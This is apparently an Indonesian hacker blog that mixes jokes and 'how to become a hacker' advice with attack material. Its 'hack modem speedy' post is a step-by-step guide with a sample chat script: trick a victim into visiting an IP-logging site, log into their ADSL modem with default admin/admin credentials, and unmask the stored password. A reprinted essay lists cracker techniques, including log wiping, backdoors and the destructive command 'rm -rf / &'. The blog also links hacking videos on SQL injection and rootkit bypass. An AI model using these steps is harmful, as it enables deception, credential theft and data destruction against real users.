Anda mutlak harus mengetahui beberapa urutan pemrograman dan mengetahui sekurang-kurangnya sebuah sistem operasi bekerja. Sekali anda menguasai point ini anda seharusnya mengetahui apa yang harus dilakukan selanjutnya, mencari dan menjadi anggota beberapa komunitas hacker ternama. Setelah perjalanan ini anda akan mendapatkan teknik yang lebih kompleks dan mengetahui berbagai petunjuk yang berbeda.
Tahap dasar terakhir adalah menjaga keutamaan dari eksploit terakhir dan mengambil pengetahuan dari eksploit umum sebelumnya. Pada Sistem Windows ini hal yang sederhana, tapi pada sistem *nix, cakupannya lebih luas diantara berbagai distro dan service yang berbeda.
Ada beberapa website terbaik untuk mendapatkan berbagai eksploit dan laporan keamanan, yaitu:
- www.securityfocus.com <== yang terbaik
- http://packetstormsecurity.org
serta beberapa diantaranya yang berisikan tutorial orisinil, seperti:
- http://www.ninjawriters.org
- http://blacksun.box.sk
- www.thehackerschoice.org
- www.phrack.org
- www.axion-network.org
Untuk komunitas terkenal di Indonesia, diantara:
- www.jasakom.com
- www.kecoak.or.id
- www.neoteker.or.id
- www.renjana.ws/portal
Bagian dari teka-teki datang secara perlahan-lahan, dan mereka banyak bekerja sama. Namun jika anda mendidik diri sendiri dan teguh hati, anda akan menemukan bahwa metode ini akan menolong anda menjadi lebih berpengetahuan dan melakukan sesuatu dengan computer yang sebelumnya anda pikir tidak mungkin dilakukan. Jika anda melompat satu atau dua tahapan diatas, anda akan mengalami kesulitan serius, dan mengetahui bahwa anda memiliki beberapa keterampilan tapi tidak dapat melakukan banyak dengannya.
JANGAN MAU MENJADI PECUNDANG ATAU PEMBUAL DI CHANEL IRC, YANG CUMAN DUDUK DI DEPAN COMPUTER SEPANJANG HARI BERMAIN GAMES ONLINE, DAN MENYOMBONGKAN DIRI BETAPA BANYAK WEBSITE YANG TELAH DI HACK. Di Chanel IRC, mereka ini menggunakan PsyBNC dengan nick yang aneh-aneh, komunitas script untuk menakut-nakuti para Newbie. Sebenarnya mereka tidak tahu apa-apa :(
Membaca, Memprogram, dan Pengalaman ekperimental adalah satu-satunya cara untuk menjadi seorang hacker, jangan mengenal kata “malas”. Menjadi seorang hacker adalah lebih dari sekedar memasuki suatu sistem, tapi juga mengetahui bagaimana suatu program bekerja dan mampu membuat bagaimana mereka melakukan apa yang anda ingin mereka lakukan.
Seluruh tahapan ini bukanlah hal yang kaku, banyak orang menempuh cara dan belajar yang berbeda… tapi seringkali memiliki suatu pemahaman yang kuat bagaimana Network, Sistem Operasi itu bekerja, cara memprogram disertai pengetahuan dari bagaimana sekuriti bekerja.

jokes

08.26 by 1hacker's 0 komentar
Haxhax, tulisan ini didedikasikan buat semua cewek2 yang punya cowok orang IT, yahh kira2 seperti saya ini lah, agar supaya kalian siap menghadapi segala kemungkinan jika jadi menikah, (saya pribadi publikasikan ini khusus buat cerna haxhax) moga2 aja dia baca heheh phew :P
Berikut beberapa contoh yang mungkin saja bisa terjadi:
Mas kawin yang Anda minta di hari pernikahan adalah seperangkat komputer dan modem Tunai!
Bel di rumah Anda bertuliskan “Click here to begin“

Pintu kamar mandi Anda bertuliskan “This site contains Adult Material, please verify your age“
Anda menanyakan apakah ada email baru untuk anda kepada Pak Pos yang mengantarkan kartu lebaran.
Mimpi anda selalu berawal dengan http://www.
Anda menggunakan search engine Google untuk mencari anak anda yang sudah tiga hari tidak pulang ke rumah.
Unable to locate your server!” kata Anda ketika menerima telepon salah sambung.
Anak-anak Anda diberi nama salsabil azhar.gov agar kelak dia jadi pegawai negeri sipil dansalsabila.edu agar kelak dia jadi mahasiswa abadi.
Suara dengkuran Anda sudah persis mirip dengan suara Handshake modem.
Anda susah menggerakan jari Anda karena Anda sudah online selama 36 jam.
Anda menonton film “The Net” … 63 kali.
Ketika mobil Anda menyeruduk mobil lain di simpang jalan, yang pertama Anda cari adalah tombol UNDO.
Istri Anda meletakan wig di atas monitor Anda untuk mengingatkan Anda seperti apa tampangnya.
Ketika Malam Pertama, Istri Anda mengatakan ” New Device has been found, Searching For Driver”
Celana dalam Istri anda bertuliskan “Plug And Play Support”
Anda memberi nama anak Anda Eudora, Netscape dan mIRC. Dan kalau anda lebih demokratis (tidak monopistis) anda akanmemberi nama anak anda Linux , debian, atau distro-distronya.
Anda memperkenalkan diri sebagai : youremail@y… atau www.domain.com
Anda membuat tatoo di badan Anda “This body best viewed with Internet Explorer 5.5 or higher.”
Anda meninggalkan antrian tiket kereta api dengan berkata “request time out!!!”
Ketika hidup anda mengalami depresi, anda akan sangat menyesal mengapa tubuh anda tidak dilengkapi dengan tombol Ctrl-Alt-Del.
Arisan atau rapat keluarga menggunakan conference YM.
Ketika sedang tidak ingin menerima tamu, pintu di rumah anda bertuliskan : “Bandwitch Limit exceed”
Ketika salah satu keluarga Anda meninggal, di batu nisannya anda tuliskan : “Fatal error Maximum execution time 100 years old exceeded.
masih minat ? terserah…





Berikut ini adalah beberapa nama tim sepak bola yang baru didirikan karena terjadi demam Piala Dunia 2006:
- Persetan = Persatuan Sepak Bola Kagetan (Cuma main kalo ada event gede aja)
- Persemaian = Persatuan Sepak Bola Mencari Kedamaian (anggota timnya pada galau semua)
- Perbudakan = Persatuan Sepak Bola Udak-Udakan (Udak-udakan = kejar-kejaran)
- Perselingkuhan = Persatuan Sepak Bola Lingkungan Kelurahan
- Persetujuan = Persatuan Sepak Bola Tanpa Tujuan (yang penting sebelas)

- Persenjataan = Persatuan Sepak Bola Manja Tapi Rupawan (Paling gak jelas maksudnya)
- Persimpangan = Persatuan Sepak Bola Simpan, Pinjam dan Utangan
- Persidangan = Persatuan Sepak Bola Tendang-Tendangan (Padahal udah jelas bolanya disepak)
- Persilangan = Persatu Sepak Bola Hilang Delapan (Anggotanya cuma tiga orang, huahahahaha!)
- Persendian = Persatuan Sepak Bola Entah mau Diapakan (yang penting punya tim)
- Persalinan = Persatuan Sepak Bola Ahli Kandungan (gak jauh2 ya namanya?)
- Persekongkolan = Persatuan Sepak Bola Tongkrongan Pengkolan (dari pada godain cewek lewat, mendingan maen bola)
- Perseteruan = Persatuan Sepak Bola Peternak Unggas dan Burung-burungan
- Persamaan = Persatuan Sepak Bola Maunya Duluan (Mau kalah, mau menang yang penting duluan)
klo ada pembaca yang mau nambahin boleh aja :P


DONT JUDGE THE BOOK BY THE COVER
( Jangan menghukum buku dengan koper )
Jangan putus asa, tidak semua orang menilai manusia dari fisiknya, sapa
tau bisa dari rumahnya, mobilnya, pekerjaannya, atau tabungannya.
LIKE FATHER LIKE SON
( Suka bapaknya, suka juga sama anaknya )
(Ga dapet duit kalo ngga kesakitan dulu…kaya kuda lumping )
Jgn sakit ati kalo dikatain jelek, cuek aja, inget film ‘Beauty and The
Beast’ kan?

JUST BEE YOURSELF
(Sengatkan diri anda dengan tawon)
Jadilah diri kamu sendiri, kalau kamu jelek syukurilah, soalnya kalo
kamu cakep pasti kamu bakal banyak dosanya. hehehe…
THE TRUTH IS OUT THERE
(Yang bener boleh keluar)
Kalau orang lain menilai kamu jelek, jangan diambil ati, penilaian
manusia tidak selalu benar (maksudnya kali kamu sebenarnya lebih jelek
lagi)
THE RIGHT MAN IN THE WRONG PLACE
(Orang di sebelah kanan,salah tempat…hrsnya disebelah kiri)
Cakep-jelek itu tergantung lingkungan, misalnya kamu di sini jelek tapi
di Afrika bisa paling cakep lho, makanya pindah ke sono aja. hehehe…
LOVE IS BLIND
(Mencintai orang buta)
Cinta tidak memandang cakep atau jelek, ga percaya? Tanyakan hal ini
sama orang jelek…
Memang CAKEP itu RELATIF…tapi kalo JELEK itu MUTLAK BO !!



Kepada Rekan-Rekan:
Mohon kiranya bagi siapa yg memiliki rekening di bank yg tercantum dibawah ini, agar waspada dan terus memonitor perkembangan bank dimaksud, sebelum terjadi kesulitan utk mencairkan dananya.
Dengan berakhirnya program penjaminan Pemerintah atas simpanan dana pihak ketiga di perbankan nasional periode 31 Januari 2004 dan pasca dibubarkannya BPPN, nasabah saat ini harus pandai-pandai menilai , memilih bank yg sehat sebagai partner, dalam aktivitas usaha ataupun tempat untuk menyimpan dana.

Dengan dibubarkannya BPPN pada Februari 2004 maka berarti tidak akan ada lagi lembaga yg akan menyelamatkan bank2 sakit/sekarat.
Pernyataan dari Dirjen Lembaga Keuangan yg secara tersirat menyatakan akan ada beberapa bank lagi yang akan tutup, berdasarkan hasil investigasi yang kami peroleh.
Berikut daftar bank bank yang akan tutup:
1. Bank Bukopin
2. Bank BRI
3. Bank Mandiri
4. Bank BTN
5. Bank Danamon
6. Bank BCA
7. Bank BII
8. Bank Permata
9. Bank Niaga
10. Bank Agro
11. Bank ABN
12. Citibank
13. Bank HSBC
14. Bank Panin
15. Bank Standard Chartered
16. Bank BNI
17. Bank NISP
Bank-bank tersebut di atas akan tutup sore hari setiap harinya sekitar pukul 15.00 dan akan dibuka kembali esok pagi setiap harinya (kecuali sabtu-minggu) sekitar pukul 08.00. Demikian pemberitahuan ini kami sampaikan, agar maklum adanya..
Ttd.
manager


Macam-macam penyakit cewek
Nangisuitis
Akibat terlalu sensitif.
Gejalanya bibir cemberut,mata kedip-kedip.
Efek sampingnya mata bengkak, saputangan banjir, hidung meler,
bawaannya ngurung diri atau terkena penyakit
Curhatitis A.
Penyakit ini bisa diobati dengan obat Tegaridol, OBH (Obat Berhati Hamba).

Curhatitis B
Bawaanya pengen nyerocos, Efek samping rahasia orang bisa bocor, terkena Nangisuitis, Penyakit ini bisa diarahkan positif jika ia bercuhatitisnya ke orang yang tepat, apalagi sama Tuhan.
Shopping Syndrome
Gejalanya pengen jalan mulu, mata melotot, Efek sampingnya lidah ngiler, mulut nganga, dompet jadi tipis. Jika sudah
masuk stadium 4 (parah banget) dompet cowoknya ikut tipis.
Coba minum hematcold atau tablet PD (Pengendalian Diri).
Cerewetisme
Lebih parah dari Curhatitis B, tidak mengandung titik koma.
Efek samping muncrat, telinga tetanga budek, dada cowoknya bisa jadi lebih halus karena sering mengelus. Lebih
cepat makan pil dengar dan minum tablet bicara lebih diperlambat.
Lamanian Dandanitos
Pengennya diem depan cermin. Tangan kiri gatel-gatel pengen pegang sisir, tangan kanan kram-kram pengen
teplok-teplok pipi pake bedak. Efek samping: menor, telat, cowoknya berkarat, gak kebagean makanan. Minum segera Sari Bawak (Bagi Waktu) dan Taperi (tambah percaya diri).
Buat cowok minum Toleransikipil 230 sendok sehari sesudah dan sebelum mandi.
Cemburunotomy
Gejala muka lonjong, tangan mengepal, ahli menukik.
Coba cegah dengan obat sirup prasangka baik tiga sendok sehari, Pil pengertian dan tablet selidiki dahulu.
Ngambekilation
Gejala hampir sama dengan Cemburubotomy. Minum Sabaron dan Bersyukurinis.

Lelaki biasa:
Masuk ke toilet, ternyata penuh, keluar lagi dan
kencing di balik pohon.
Lelaki gaul:
Selalu ikut teman²nya ke toilet walaupun ia tidak
ingin buang air kecil.
Lelaki pemalu:
Jika merasa dilihat atau dilirik orang lain, air
kencingnya tidak keluar, tapi pura2 menyiram,
keluar, lalu kembali lagi kemudian.

Lelaki suka melamun:
Membuka rompi, mengeluarkan dasinya, lalu
kencing di celana.
Lelaki efisien:
Meskipun sudah waktunya kencing, tapi ditahan
dulu sampai kebelet buang air besar, baru
kemudian melakukan keduanya dalam satu waktu.
Lelaki pemabuk:
Jempol kiri dipegang dengan tangan kanan, lalu
kencing di celana.
Lelaki palsu:
Kencing di toilet cewek!
Lelaki pelit:
Kalau beol di WC umum ngakunya kencing (biar
bayar murah)
Lelaki malu²in :
Kencing di celana.
Lelaki edan:
Makai celana yang abis dikencingin.
Lelaki sarap:
Pakai celana yang habis dikencingin tapi dicium
dulu kali2 baunya sudah jadi bau duren..
Lelaki kreatif:
Kalau kencing kakinya diangkat satu…
Lelaki irit:
Kagak pernah kencing seumur umur.
Lelaki nekad:
Suka ngencingi bini tetangga.
Lelaki funky:
Kencing di tempat umum.
Lelaki sial :
mau nya kencing air yg keluar batu
Lelaki Enjoying:
Kencing sambil merem-melek
Lelaki Hemat waktu :
Cuma Buka resleting, dikeluarin trus langsung
kencing
Lelaki moody :
biasa pake’ pampers … hehehe …
Lelaki kurang ajar:
lagi kencing ..eh kentut..pura2 cuek lagi!
Lelaki buta huruf:
di toilet sudah ada tulisan rusak masih di
kencingin juga
Lelaki turunan kucing:
gak bisa liat barang baru, diendus2 trus dikencingin
Lelaki sabar:
nungguin air cebok gak keluar2, manteeng aja di
urinoir
Lelaki hiphop:
kencing sambil kejang2 breakdance
Lelaki pembenci:
sesudah kencing trus ngeludahin kencingnya
Lelaki ramah :
ngajak ngobrol sambil kencing, sampe temennya
gak bisa kencing
Lelaki percaya diri:
sudah kencing, anunya dibawa jalan2 ke wastafel
mo cebok
Lelaki pelupa:
sudah kencing, keluar wc, buru2 balik lagi, krn
masih pgn kencing beberapa tetes lagi
Lelaki dermawan:
kencing gak keluar tapi tetep bayar uang
ada yang mau nambahin….bolh aja ko




hack modem speedy

08.16 by 1hacker's 0 komentar

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D
Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.
Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :
Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )
Website dengan log system flat file ( diambil dari artikelnya Anggi J. )
Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )
Internet Password Asterisk Reveal
( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )
Langkah Pertama
Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.
Langkah Ke Dua
Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :
Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???
Sang_korban : apaan tuh ?
Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.
Sang_korban : coba, gw liat dulu. # kena!!
Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U
Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.
Contoh IP yang sudah dilog dalam flat file,
Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:
Langkah Ketiga
Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.
Penanganan
Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te –> bentuk lain dari ilmuwebsite
Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.
Default password untuk setiap modem :
http://www.elitehackers.info/defaultpasslist.php

buat pencerahan gan kalo ad yg mau jadi hacker

08.15 by 1hacker's 0 komentar
Belajar Menjadi Hacker
Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls <domain or network>’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn <user>’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.
so pahami dlu filosopi nya ..baru dech berkoar-koar. jangan sampai jadi sok and ngaku-ngaku suka hacking kalo ngk tau tetek bengek nya..okey

link dl vieo hacker sob

08.15 by 1hacker's 0 komentar
Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung aja download. Artikel ini aku ambil dari cyberphreaking.com dan tempat lain . Jika ada komplain maka artikel ini akan di unpublish,

klik selanjutnya untuk selengkapnya





Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung aja download. Artikel ini aku ambil dari cyberphreaking.com dan tempat lain . Jika ada komplain maka artikel ini akan di unpublish,


1. DeluxeBB 1.06 Exploit (9mb)
Remote SQL Injection Exploit

Code:
http://rapidshare.com/files/11156227/100_live585.rar

2. NetBios Live Hack (5mb)
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)

Code:
http://rapidshare.com/files/11158778/101_netbios585.rar

3. Classified (7mb)
Shows how site classified is Hacked.

Code:
http://rapidshare.com/files/11158779/102_site585.rar

4. NASA (2mb)
NASA Department website Hacked.

Code:
http://rapidshare.com/files/11158865/92_meh.zip

5. Linux Network Monitor (5mb)
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.

Code:
http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip

6. Linux DNS Server (11mb)
This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.

Code:


7. Windows Web Server (6mb)
This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.

Code:
http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip

8. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.

Code:
http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip

9. Hacker Defender Movie (8mb)
Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.

Code:
http://rapidshare.com/files/11158766/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar

10. 0-DAY Simple SQL Injection (8mb)
A film project about a cracker with the name zer0day. (Hacking with Linux -php)

Code:
http://rapidshare.com/files/11158799/89_simple-sql-injection.zip

11. wbb (10mb)
wbb portal hacked by XSS.

Code:
http://rapidshare.com/files/11158816/82_wbb_portal.rar

12. Reverse Engineering (20mb)
Reverse Engineering with LD PRELOAD

Code:
http://rapidshare.com/files/ 11158857/83_reverse.rar

13. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration

Code:
http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar

14. IPB 1.3 SQL (10mb)
Invasion Power Board 1.3 SQL Injection Exploit

Code:
http://rapidshare.com/files/11158768/86_IPB_SQL.rar

15. Qnix Buffer Overflows (11mb)
Qnix Demonstrating Exploration of Simple Buffer Overflows

Code:
http://rapidshare.com/files/11158770/87_buff.rar

16. ASP SQL (5mb)
Simple ASP Administrator SQL Injection (5mb)

Code:
http://rapidshare.com/files/11158795/88_asp_sql.rar

17. Blind MySQL (9mb)
Demonstration of Blind MySQL Injection (bsqlbf)

Code:
http://rapidshare.com/files/11158804/77_Blind_MySQL.rar

18. D-Link Wireless (3mb)
Intruders D-Link Wireless Access Point Configuration Disclosure

Code:
http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar

19. Mysql bftools (8mb)
Demonstration of Blind MySQL Injection (mysql_bftools)

Code:
